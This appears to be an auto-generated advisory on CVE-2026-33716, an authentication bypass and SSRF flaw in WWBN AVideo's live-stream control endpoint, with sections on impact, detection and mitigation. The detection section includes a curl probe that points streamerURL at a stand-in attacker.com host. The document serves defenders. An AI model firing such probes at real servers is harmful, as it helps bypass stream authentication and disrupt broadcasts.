Executive Summary

CVE-2026-33716 is a critical vulnerability in the WWBN AVideo platform affecting versions up to 28.0. It exists in the live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php`, which accepts a user-supplied `streamerURL` parameter without validation.

An attacker can supply a malicious `streamerURL` that redirects token verification requests to a server they control. This malicious server always returns a response indicating no error, effectively bypassing authentication.

By bypassing authentication, the attacker gains unauthenticated control over live streams, including the ability to drop active publishers, start or stop recordings, and probe whether streams are active.

Additionally, SSL verification is disabled in the HTTP requests used for token verification, enabling Server-Side Request Forgery (SSRF) attacks where the server can be tricked into making requests to attacker-controlled or internal URLs.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can have several serious impacts:

• Denial of Service: Attackers can terminate any live broadcast without authentication, disrupting service availability.
• Unauthorized Recording: Attackers can start recording live streams without permission, risking privacy breaches.
• Stream Enumeration: Attackers can probe and discover active stream names, potentially exposing sensitive information.
• Server-Side Request Forgery (SSRF): The server makes outbound HTTP requests to attacker-controlled URLs without SSL verification, which could expose internal services or lead to further exploitation.

No authentication or user interaction is required to exploit this vulnerability, making it highly accessible to attackers.

Useful 0 Not Useful 0

Compliance Impact

I don't know

Useful 0 Not Useful 0

Detection Guidance

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring requests to the live stream control endpoint at `plugin/Live/standAloneFiles/control.json.php` that include the `streamerURL` parameter. Suspicious requests where `streamerURL` points to an external or unexpected URL may indicate exploitation attempts.'}, {'type': 'paragraph', 'content': 'You can use network monitoring tools or web server logs to identify such requests.'}, {'type': 'paragraph', 'content': 'Example commands to detect suspicious activity include:'}, {'type': 'list_item', 'content': "Using grep on web server access logs to find requests with the `streamerURL` parameter: `grep 'control.json.php' /var/log/apache2/access.log | grep 'streamerURL='`"}, {'type': 'list_item', 'content': "Using curl to test if the endpoint accepts user-supplied `streamerURL`: `curl -G 'http://yourserver/plugin/Live/standAloneFiles/control.json.php' --data-urlencode 'streamerURL=http://attacker.com/'`"}, {'type': 'list_item', 'content': 'Monitoring outbound HTTP requests from the server to unexpected URLs, which may indicate SSRF exploitation.'}] [1]

Useful 0 Not Useful 0

Mitigation Strategies

Immediate mitigation steps include removing the ability for users to supply the `streamerURL` parameter in the `control.json.php` endpoint.

Instead, configure the `streamerURL` to be sourced only from trusted server configuration or hard-coded values within the application.

Apply the patch from commit 388fcd57dbd16f6cb3ebcdf1d08cf2b929941128 which enforces this change and sanitizes other parameters to prevent path traversal.

Additionally, monitor and restrict outbound HTTP requests from the server to prevent SSRF attacks.

If possible, upgrade to a fixed version of the WWBN AVideo platform that includes these security improvements.

Useful 0 Not Useful 0